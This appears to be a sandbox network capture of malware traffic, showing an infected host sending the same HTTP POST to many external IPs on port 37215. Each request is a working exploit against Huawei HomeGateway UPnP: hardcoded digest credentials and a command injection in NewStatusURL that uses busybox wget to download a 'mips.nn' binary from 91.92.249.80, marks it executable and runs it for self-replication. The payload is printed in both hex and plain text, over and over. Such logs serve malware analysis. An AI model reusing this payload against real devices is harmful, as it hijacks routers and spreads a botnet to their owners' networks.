[TRUNCATED]
                                          Data Ascii: <?xml version="1.0" ?><s:Envelope xmlns:s="http://schemas.xmlsoap.org/soap/envelope/" s:encodingStyle="http://schemas.xmlsoap.org/soap/encoding/"><s:Body><u:Upgrade xmlns:u="urn:schemas-upnp-org:service:WANPPPConnection:1"><NewStatusURL>$(/bin/busybox wget -g 91.92.249.80 -l /tmp/.wei -r /mips.nn; /bin/busybox chmod 777 /tmp/.wei; /tmp/.wei selfrep.huawei)</NewStatusURL><NewDownloadURL>$(echo HUAWEIUPNP)</NewDownloadURL></u:Upgrade></s:Body></s:Envelope>


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          1717192.168.2.234617641.50.163.11437215
                                          TimestampBytes transferredDirectionData
                                          May 28, 2024 14:47:02.536803007 CEST827OUTPOST /ctrlt/DeviceUpgrade_1 HTTP/1.1
                                          Connection: keep-alive
                                          Accept: */*
                                          Authorization: Digest username="dslf-config", realm="HuaweiHomeGateway", nonce="88645cefb1f9ede0e336e3569d75ee30", uri="/ctrlt/DeviceUpgrade_1", response="3612f843a42db38f48f59d2a3597e19c", algorithm="MD5", qop="auth", nc=00000001, cnonce="248d1a2560100669"
                                          Content-Length: 458
                                          Data Raw: 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 3f 3e 3c 73 3a 45 6e 76 65 6c 6f 70 65 20 78 6d 6c 6e 73 3a 73 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 76 65 6c 6f 70 65 2f 22 20 73 3a 65 6e 63 6f 64 69 6e 67 53 74 79 6c 65 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 63 6f 64 69 6e 67 2f 22 3e 3c 73 3a 42 6f 64 79 3e 3c 75 3a 55 70 67 72 61 64 65 20 78 6d 6c 6e 73 3a 75 3d 22 75 72 6e 3a 73 63 68 65 6d 61 73 2d 75 70 6e 70 2d 6f 72 67 3a 73 65 72 76 69 63 65 3a 57 41 4e 50 50 50 43 6f 6e 6e 65 63 74 69 6f 6e 3a 31 22 3e 3c 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 24 28 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 2d 67 20 39 31 2e 39 32 2e 32 34 39 2e 38 30 20 2d 6c 20 2f 74 6d 70 2f 2e 77 65 69 20 2d 72 20 2f 6d 69 70 73 2e 6e 6e 3b 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 63 68 6d 6f 64 20 37 37 37 20 2f 74 6d 70 2f 2e 77 65 69 3b 20 2f 74 6d 70 2f [TRUNCATED]
                                          Data Ascii: <?xml version="1.0" ?><s:Envelope xmlns:s="http://schemas.xmlsoap.org/soap/envelope/" s:encodingStyle="http://schemas.xmlsoap.org/soap/encoding/"><s:Body><u:Upgrade xmlns:u="urn:schemas-upnp-org:service:WANPPPConnection:1"><NewStatusURL>$(/bin/busybox wget -g 91.92.249.80 -l /tmp/.wei -r /mips.nn; /bin/busybox chmod 777 /tmp/.wei; /tmp/.wei selfrep.huawei)</NewStatusURL><NewDownloadURL>$(echo HUAWEIUPNP)</NewDownloadURL></u:Upgrade></s:Body></s:Envelope>


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          1718192.168.2.2359712157.106.187.5937215
                                          TimestampBytes transferredDirectionData
                                          May 28, 2024 14:47:02.536803007 CEST827OUTPOST /ctrlt/DeviceUpgrade_1 HTTP/1.1
                                          Connection: keep-alive
                                          Accept: */*
                                          Authorization: Digest username="dslf-config", realm="HuaweiHomeGateway", nonce="88645cefb1f9ede0e336e3569d75ee30", uri="/ctrlt/DeviceUpgrade_1", response="3612f843a42db38f48f59d2a3597e19c", algorithm="MD5", qop="auth", nc=00000001, cnonce="248d1a2560100669"
                                          Content-Length: 458
                                          Data Raw: 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 3f 3e 3c 73 3a 45 6e 76 65 6c 6f 70 65 20 78 6d 6c 6e 73 3a 73 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 76 65 6c 6f 70 65 2f 22 20 73 3a 65 6e 63 6f 64 69 6e 67 53 74 79 6c 65 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 63 6f 64 69 6e 67 2f 22 3e 3c 73 3a 42 6f 64 79 3e 3c 75 3a 55 70 67 72 61 64 65 20 78 6d 6c 6e 73 3a 75 3d 22 75 72 6e 3a 73 63 68 65 6d 61 73 2d 75 70 6e 70 2d 6f 72 67 3a 73 65 72 76 69 63 65 3a 57 41 4e 50 50 50 43 6f 6e 6e 65 63 74 69 6f 6e 3a 31 22 3e 3c 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 24 28 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 2d 67 20 39 31 2e 39 32 2e 32 34 39 2e 38 30 20 2d 6c 20 2f 74 6d 70 2f 2e 77 65 69 20 2d 72 20 2f 6d 69 70 73 2e 6e 6e 3b 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 63 68 6d 6f 64 20 37 37 37 20 2f 74 6d 70 2f 2e 77 65 69 3b 20 2f 74 6d 70 2f [TRUNCATED]
                                          Data Ascii: <?xml version="1.0" ?><s:Envelope xmlns:s="http://schemas.xmlsoap.org/soap/envelope/" s:encodingStyle="http://schemas.xmlsoap.org/soap/encoding/"><s:Body><u:Upgrade xmlns:u="urn:schemas-upnp-org:service:WANPPPConnection:1"><NewStatusURL>$(/bin/busybox wget -g 91.92.249.80 -l /tmp/.wei -r /mips.nn; /bin/busybox chmod 777 /tmp/.wei; /tmp/.wei selfrep.huawei)</NewStatusURL><NewDownloadURL>$(echo HUAWEIUPNP)</NewDownloadURL></u:Upgrade></s:Body></s:Envelope>


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          1719192.168.2.234784276.191.13.1537215
                                          TimestampBytes transferredDirectionData
                                          May 28, 2024 14:47:02.536819935 CEST827OUTPOST /ctrlt/DeviceUpgrade_1 HTTP/1.1
                                          Connection: keep-alive
                                          Accept: */*
                                          Authorization: Digest username="dslf-config", realm="HuaweiHomeGateway", nonce="88645cefb1f9ede0e336e3569d75ee30", uri="/ctrlt/DeviceUpgrade_1", response="3612f843a42db38f48f59d2a3597e19c", algorithm="MD5", qop="auth", nc=00000001, cnonce="248d1a2560100669"
                                          Content-Length: 458
                                          Data Raw: 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 3f 3e 3c 73 3a 45 6e 76 65 6c 6f 70 65 20 78 6d 6c 6e 73 3a 73 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 76 65 6c 6f 70 65 2f 22 20 73 3a 65 6e 63 6f 64 69 6e 67 53 74 79 6c 65 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 63 6f 64 69 6e 67 2f 22 3e 3c 73 3a 42 6f 64 79 3e 3c 75 3a 55 70 67 72 61 64 65 20 78 6d 6c 6e 73 3a 75 3d 22 75 72 6e 3a 73 63 68 65 6d 61 73 2d 75 70 6e 70 2d 6f 72 67 3a 73 65 72 76 69 63 65 3a 57 41 4e 50 50 50 43 6f 6e 6e 65 63 74 69 6f 6e 3a 31 22 3e 3c 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 24 28 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 2d 67 20 39 31 2e 39 32 2e 32 34 39 2e 38 30 20 2d 6c 20 2f 74 6d 70 2f 2e 77 65 69 20 2d 72 20 2f 6d 69 70 73 2e 6e 6e 3b 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 63 68 6d 6f 64 20 37 37 37 20 2f 74 6d 70 2f 2e 77 65 69 3b 20 2f 74 6d 70 2f [TRUNCATED]
                                          Data Ascii: <?xml version="1.0" ?><s:Envelope xmlns:s="http://schemas.xmlsoap.org/soap/envelope/" s:encodingStyle="http://schemas.xmlsoap.org/soap/encoding/"><s:Body><u:Upgrade xmlns:u="urn:schemas-upnp-org:service:WANPPPConnection:1"><NewStatusURL>$(/bin/busybox wget -g 91.92.249.80 -l /tmp/.wei -r /mips.nn; /bin/busybox chmod 777 /tmp/.wei; /tmp/.wei selfrep.huawei)</NewStatusURL><NewDownloadURL>$(echo HUAWEIUPNP)</NewDownloadURL></u:Upgrade></s:Body></s:Envelope>


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          1720192.168.2.2334906197.206.219.23537215
                                          TimestampBytes transferredDirectionData
                                          May 28, 2024 14:47:02.536978006 CEST827OUTPOST /ctrlt/DeviceUpgrade_1 HTTP/1.1
                                          Connection: keep-alive
                                          Accept: */*
                                          Authorization: Digest username="dslf-config", realm="HuaweiHomeGateway", nonce="88645cefb1f9ede0e336e3569d75ee30", uri="/ctrlt/DeviceUpgrade_1", response="3612f843a42db38f48f59d2a3597e19c", algorithm="MD5", qop="auth", nc=00000001, cnonce="248d1a2560100669"
                                          Content-Length: 458
                                          Data Raw: 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 3f 3e 3c 73 3a 45 6e 76 65 6c 6f 70 65 20 78 6d 6c 6e 73 3a 73 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 76 65 6c 6f 70 65 2f 22 20 73 3a 65 6e 63 6f 64 69 6e 67 53 74 79 6c 65 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 63 6f 64 69 6e 67 2f 22 3e 3c 73 3a 42 6f 64 79 3e 3c 75 3a 55 70 67 72 61 64 65 20 78 6d 6c 6e 73 3a 75 3d 22 75 72 6e 3a 73 63 68 65 6d 61 73 2d 75 70 6e 70 2d 6f 72 67 3a 73 65 72 76 69 63 65 3a 57 41 4e 50 50 50 43 6f 6e 6e 65 63 74 69 6f 6e 3a 31 22 3e 3c 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 24 28 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 2d 67 20 39 31 2e 39 32 2e 32 34 39 2e 38 30 20 2d 6c 20 2f 74 6d 70 2f 2e 77 65 69 20 2d 72 20 2f 6d 69 70 73 2e 6e 6e 3b 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 63 68 6d 6f 64 20 37 37 37 20 2f 74 6d 70 2f 2e 77 65 69 3b 20 2f 74 6d 70 2f [TRUNCATED]
                                          Data Ascii: <?xml version="1.0" ?><s:Envelope xmlns:s="http://schemas.xmlsoap.org/soap/envelope/" s:encodingStyle="http://schemas.xmlsoap.org/soap/encoding/"><s:Body><u:Upgrade xmlns:u="urn:schemas-upnp-org:service:WANPPPConnection:1"><NewStatusURL>$(/bin/busybox wget -g 91.92.249.80 -l /tmp/.wei -r /mips.nn; /bin/busybox chmod 777 /tmp/.wei; /tmp/.wei selfrep.huawei)</NewStatusURL><NewDownloadURL>$(echo HUAWEIUPNP)</NewDownloadURL></u:Upgrade></s:Body></s:Envelope>


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          1721192.168.2.235077641.13.9.13337215
                                          TimestampBytes transferredDirectionData
                                          May 28, 2024 14:47:02.537200928 CEST827OUTPOST /ctrlt/DeviceUpgrade_1 HTTP/1.1
                                          Connection: keep-alive
                                          Accept: */*
                                          Authorization: Digest username="dslf-config", realm="HuaweiHomeGateway", nonce="88645cefb1f9ede0e336e3569d75ee30", uri="/ctrlt/DeviceUpgrade_1", response="3612f843a42db38f48f59d2a3597e19c", algorithm="MD5", qop="auth", nc=00000001, cnonce="248d1a2560100669"
                                          Content-Length: 458
                                          Data Raw: 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 3f 3e 3c 73 3a 45 6e 76 65 6c 6f 70 65 20 78 6d 6c 6e 73 3a 73 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 76 65 6c 6f 70 65 2f 22 20 73 3a 65 6e 63 6f 64 69 6e 67 53 74 79 6c 65 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 63 6f 64 69 6e 67 2f 22 3e 3c 73 3a 42 6f 64 79 3e 3c 75 3a 55 70 67 72 61 64 65 20 78 6d 6c 6e 73 3a 75 3d 22 75 72 6e 3a 73 63 68 65 6d 61 73 2d 75 70 6e 70 2d 6f 72 67 3a 73 65 72 76 69 63 65 3a 57 41 4e 50 50 50 43 6f 6e 6e 65 63 74 69 6f 6e 3a 31 22 3e 3c 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 24 28 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 2d 67 20 39 31 2e 39 32 2e 32 34 39 2e 38 30 20 2d 6c 20 2f 74 6d 70 2f 2e 77 65 69 20 2d 72 20 2f 6d 69 70 73 2e 6e 6e 3b 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 63 68 6d 6f 64 20 37 37 37 20 2f 74 6d 70 2f 2e 77 65 69 3b 20 2f 74 6d 70 2f [TRUNCATED]
                                          Data Ascii: <?xml version="1.0" ?><s:Envelope xmlns:s="http://schemas.xmlsoap.org/soap/envelope/" s:encodingStyle="http://schemas.xmlsoap.org/soap/encoding/"><s:Body><u:Upgrade xmlns:u="urn:schemas-upnp-org:service:WANPPPConnection:1"><NewStatusURL>$(/bin/busybox wget -g 91.92.249.80 -l /tmp/.wei -r /mips.nn; /bin/busybox chmod 777 /tmp/.wei; /tmp/.wei selfrep.huawei)</NewStatusURL><NewDownloadURL>$(echo HUAWEIUPNP)</NewDownloadURL></u:Upgrade></s:Body></s:Envelope>


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          1722192.168.2.234505241.52.112.7037215
                                          TimestampBytes transferredDirectionData
                                          May 28, 2024 14:47:02.537210941 CEST827OUTPOST /ctrlt/DeviceUpgrade_1 HTTP/1.1
                                          Connection: keep-alive
                                          Accept: */*
                                          Authorization: Digest username="dslf-config", realm="HuaweiHomeGateway", nonce="88645cefb1f9ede0e336e3569d75ee30", uri="/ctrlt/DeviceUpgrade_1", response="3612f843a42db38f48f59d2a3597e19c", algorithm="MD5", qop="auth", nc=00000001, cnonce="248d1a2560100669"
                                          Content-Length: 458
                                          Data Raw: 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 3f 3e 3c 73 3a 45 6e 76 65 6c 6f 70 65 20 78 6d 6c 6e 73 3a 73 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 76 65 6c 6f 70 65 2f 22 20 73 3a 65 6e 63 6f 64 69 6e 67 53 74 79 6c 65 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 63 6f 64 69 6e 67 2f 22 3e 3c 73 3a 42 6f 64 79 3e 3c 75 3a 55 70 67 72 61 64 65 20 78 6d 6c 6e 73 3a 75 3d 22 75 72 6e 3a 73 63 68 65 6d 61 73 2d 75 70 6e 70 2d 6f 72 67 3a 73 65 72 76 69 63 65 3a 57 41 4e 50 50 50 43 6f 6e 6e 65 63 74 69 6f 6e 3a 31 22 3e 3c 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 24 28 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 2d 67 20 39 31 2e 39 32 2e 32 34 39 2e 38 30 20 2d 6c 20 2f 74 6d 70 2f 2e 77 65 69 20 2d 72 20 2f 6d 69 70 73 2e 6e 6e 3b 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 63 68 6d 6f 64 20 37 37 37 20 2f 74 6d 70 2f 2e 77 65 69 3b 20 2f 74 6d 70 2f [TRUNCATED]
                                          Data Ascii: <?xml version="1.0" ?><s:Envelope xmlns:s="http://schemas.xmlsoap.org/soap/envelope/" s:encodingStyle="http://schemas.xmlsoap.org/soap/encoding/"><s:Body><u:Upgrade xmlns:u="urn:schemas-upnp-org:service:WANPPPConnection:1"><NewStatusURL>$(/bin/busybox wget -g 91.92.249.80 -l /tmp/.wei -r /mips.nn; /bin/busybox chmod 777 /tmp/.wei; /tmp/.wei selfrep.huawei)</NewStatusURL><NewDownloadURL>$(echo HUAWEIUPNP)</NewDownloadURL></u:Upgrade></s:Body></s:Envelope>


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          1723192.168.2.2346832157.169.250.4937215
                                          TimestampBytes transferredDirectionData
                                          May 28, 2024 14:47:02.537266970 CEST827OUTPOST /ctrlt/DeviceUpgrade_1 HTTP/1.1
                                          Connection: keep-alive
                                          Accept: */*
                                          Authorization: Digest username="dslf-config", realm="HuaweiHomeGateway", nonce="88645cefb1f9ede0e336e3569d75ee30", uri="/ctrlt/DeviceUpgrade_1", response="3612f843a42db38f48f59d2a3597e19c", algorithm="MD5", qop="auth", nc=00000001, cnonce="248d1a2560100669"
                                          Content-Length: 458
                                          Data Raw: 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 3f 3e 3c 73 3a 45 6e 76 65 6c 6f 70 65 20 78 6d 6c 6e 73 3a 73 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 76 65 6c 6f 70 65 2f 22 20 73 3a 65 6e 63 6f 64 69 6e 67 53 74 79 6c 65 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 63 6f 64 69 6e 67 2f 22 3e 3c 73 3a 42 6f 64 79 3e 3c 75 3a 55 70 67 72 61 64 65 20 78 6d 6c 6e 73 3a 75 3d 22 75 72 6e 3a 73 63 68 65 6d 61 73 2d 75 70 6e 70 2d 6f 72 67 3a 73 65 72 76 69 63 65 3a 57 41 4e 50 50 50 43 6f 6e 6e 65 63 74 69 6f 6e 3a 31 22 3e 3c 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 24 28 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 2d 67 20 39 31 2e 39 32 2e 32 34 39 2e 38 30 20 2d 6c 20 2f 74 6d 70 2f 2e 77 65 69 20 2d 72 20 2f 6d 69 70 73 2e 6e 6e 3b 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 63 68 6d 6f 64 20 37 37 37 20 2f 74 6d 70 2f 2e 77 65 69 3b 20 2f 74 6d 70 2f [TRUNCATED]
                                          Data Ascii: <?xml version="1.0" ?><s:Envelope xmlns:s="http://schemas.xmlsoap.org/soap/envelope/" s:encodingStyle="http://schemas.xmlsoap.org/soap/encoding/"><s:Body><u:Upgrade xmlns:u="urn:schemas-upnp-org:service:WANPPPConnection:1"><NewStatusURL>$(/bin/busybox wget -g 91.92.249.80 -l /tmp/.wei -r /mips.nn; /bin/busybox chmod 777 /tmp/.wei; /tmp/.wei selfrep.huawei)</NewStatusURL><NewDownloadURL>$(echo HUAWEIUPNP)</NewDownloadURL></u:Upgrade></s:Body></s:Envelope>


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          1724192.168.2.2335994157.138.202.7637215
                                          TimestampBytes transferredDirectionData
                                          May 28, 2024 14:47:02.537281990 CEST827OUTPOST /ctrlt/DeviceUpgrade_1 HTTP/1.1
                                          Connection: keep-alive
                                          Accept: */*
                                          Authorization: Digest username="dslf-config", realm="HuaweiHomeGateway", nonce="88645cefb1f9ede0e336e3569d75ee30", uri="/ctrlt/DeviceUpgrade_1", response="3612f843a42db38f48f59d2a3597e19c", algorithm="MD5", qop="auth", nc=00000001, cnonce="248d1a2560100669"
                                          Content-Length: 458
                                          Data Raw: 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 3f 3e 3c 73 3a 45 6e 76 65 6c 6f 70 65 20 78 6d 6c 6e 73 3a 73 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 76 65 6c 6f 70 65 2f 22 20 73 3a 65 6e 63 6f 64 69 6e 67 53 74 79 6c 65 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 63 6f 64 69 6e 67 2f 22 3e 3c 73 3a 42 6f 64 79 3e 3c 75 3a 55 70 67 72 61 64 65 20 78 6d 6c 6e 73 3a 75 3d 22 75 72 6e 3a 73 63 68 65 6d 61 73 2d 75 70 6e 70 2d 6f 72 67 3a 73 65 72 76 69 63 65 3a 57 41 4e 50 50 50 43 6f 6e 6e 65 63 74 69 6f 6e 3a 31 22 3e 3c 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 24 28 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 2d 67 20 39 31 2e 39 32 2e 32 34 39 2e 38 30 20 2d 6c 20 2f 74 6d 70 2f 2e 77 65 69 20 2d 72 20 2f 6d 69 70 73 2e 6e 6e 3b 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 63 68 6d 6f 64 20 37 37 37 20 2f 74 6d 70 2f 2e 77 65 69 3b 20 2f 74 6d 70 2f [TRUNCATED]
                                          Data Ascii: <?xml version="1.0" ?><s:Envelope xmlns:s="http://schemas.xmlsoap.org/soap/envelope/" s:encodingStyle="http://schemas.xmlsoap.org/soap/encoding/"><s:Body><u:Upgrade xmlns:u="urn:schemas-upnp-org:service:WANPPPConnection:1"><NewStatusURL>$(/bin/busybox wget -g 91.92.249.80 -l /tmp/.wei -r /mips.nn; /bin/busybox chmod 777 /tmp/.wei; /tmp/.wei selfrep.huawei)</NewStatusURL><NewDownloadURL>$(echo HUAWEIUPNP)</NewDownloadURL></u:Upgrade></s:Body></s:Envelope>


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          1725192.168.2.234124841.57.42.12037215
                                          TimestampBytes transferredDirectionData
                                          May 28, 2024 14:47:02.537374973 CEST827OUTPOST /ctrlt/DeviceUpgrade_1 HTTP/1.1
                                          Connection: keep-alive
                                          Accept: */*
                                          Authorization: Digest username="dslf-config", realm="HuaweiHomeGateway", nonce="88645cefb1f9ede0e336e3569d75ee30", uri="/ctrlt/DeviceUpgrade_1", response="3612f843a42db38f48f59d2a3597e19c", algorithm="MD5", qop="auth", nc=00000001, cnonce="248d1a2560100669"
                                          Content-Length: 458
                                          Data Raw: 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 3f 3e 3c 73 3a 45 6e 76 65 6c 6f 70 65 20 78 6d 6c 6e 73 3a 73 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 76 65 6c 6f 70 65 2f 22 20 73 3a 65 6e 63 6f 64 69 6e 67 53 74 79 6c 65 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 63 6f 64 69 6e 67 2f 22 3e 3c 73 3a 42 6f 64 79 3e 3c 75 3a 55 70 67 72 61 64 65 20 78 6d 6c 6e 73 3a 75 3d 22 75 72 6e 3a 73 63 68 65 6d 61 73 2d 75 70 6e 70 2d 6f 72 67 3a 73 65 72 76 69 63 65 3a 57 41 4e 50 50 50 43 6f 6e 6e 65 63 74 69 6f 6e 3a 31 22 3e 3c 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 24 28 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 2d 67 20 39 31 2e 39 32 2e 32 34 39 2e 38 30 20 2d 6c 20 2f 74 6d 70 2f 2e 77 65 69 20 2d 72 20 2f 6d 69 70 73 2e 6e 6e 3b 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 63 68 6d 6f 64 20 37 37 37 20 2f 74 6d 70 2f 2e 77 65 69 3b 20 2f 74 6d 70 2f [TRUNCATED]
                                          Data Ascii: <?xml version="1.0" ?><s:Envelope xmlns:s="http://schemas.xmlsoap.org/soap/envelope/" s:encodingStyle="http://schemas.xmlsoap.org/soap/encoding/"><s:Body><u:Upgrade xmlns:u="urn:schemas-upnp-org:service:WANPPPConnection:1"><NewStatusURL>$(/bin/busybox wget -g 91.92.249.80 -l /tmp/.wei -r /mips.nn; /bin/busybox chmod 777 /tmp/.wei; /tmp/.wei selfrep.huawei)</NewStatusURL><NewDownloadURL>$(echo HUAWEIUPNP)</NewDownloadURL></u:Upgrade></s:Body></s:Envelope>


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          1726192.168.2.235299085.230.79.9337215
                                          TimestampBytes transferredDirectionData
                                          May 28, 2024 14:47:02.537386894 CEST827OUTPOST /ctrlt/DeviceUpgrade_1 HTTP/1.1
                                          Connection: keep-alive
                                          Accept: */*
                                          Authorization: Digest username="dslf-config", realm="HuaweiHomeGateway", nonce="88645cefb1f9ede0e336e3569d75ee30", uri="/ctrlt/DeviceUpgrade_1", response="3612f843a42db38f48f59d2a3597e19c", algorithm="MD5", qop="auth", nc=00000001, cnonce="248d1a2560100669"
                                          Content-Length: 458
                                          Data Raw: 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 3f 3e 3c 73 3a 45 6e 76 65 6c 6f 70 65 20 78 6d 6c 6e 73 3a 73 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 76 65 6c 6f 70 65 2f 22 20 73 3a 65 6e 63 6f 64 69 6e 67 53 74 79 6c 65 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 63 6f 64 69 6e 67 2f 22 3e 3c 73 3a 42 6f 64 79 3e 3c 75 3a 55 70 67 72 61 64 65 20 78 6d 6c 6e 73 3a 75 3d 22 75 72 6e 3a 73 63 68 65 6d 61 73 2d 75 70 6e 70 2d 6f 72 67 3a 73 65 72 76 69 63 65 3a 57 41 4e 50 50 50 43 6f 6e 6e 65 63 74 69 6f 6e 3a 31 22 3e 3c 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 24 28 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 2d 67 20 39 31 2e 39 32 2e 32 34 39 2e 38 30 20 2d 6c 20 2f 74 6d 70 2f 2e 77 65 69 20 2d 72 20 2f 6d 69 70 73 2e 6e 6e 3b 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 63 68 6d 6f 64 20 37 37 37 20 2f 74 6d 70 2f 2e 77 65 69 3b 20 2f 74 6d 70 2f [TRUNCATED]
                                          Data Ascii: <?xml version="1.0" ?><s:Envelope xmlns:s="http://schemas.xmlsoap.org/soap/envelope/" s:encodingStyle="http://schemas.xmlsoap.org/soap/encoding/"><s:Body><u:Upgrade xmlns:u="urn:schemas-upnp-org:service:WANPPPConnection:1"><NewStatusURL>$(/bin/busybox wget -g 91.92.249.80 -l /tmp/.wei -r /mips.nn; /bin/busybox chmod 777 /tmp/.wei; /tmp/.wei selfrep.huawei)</NewStatusURL><NewDownloadURL>$(echo HUAWEIUPNP)</NewDownloadURL></u:Upgrade></s:Body></s:Envelope>


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          1727192.168.2.23525505.153.89.8037215
                                          TimestampBytes transferredDirectionData
                                          May 28, 2024 14:47:02.537405968 CEST827OUTPOST /ctrlt/DeviceUpgrade_1 HTTP/1.1
                                          Connection: keep-alive
                                          Accept: */*
                                          Authorization: Digest username="dslf-config", realm="HuaweiHomeGateway", nonce="88645cefb1f9ede0e336e3569d75ee30", uri="/ctrlt/DeviceUpgrade_1", response="3612f843a42db38f48f59d2a3597e19c", algorithm="MD5", qop="auth", nc=00000001, cnonce="248d1a2560100669"
                                          Content-Length: 458
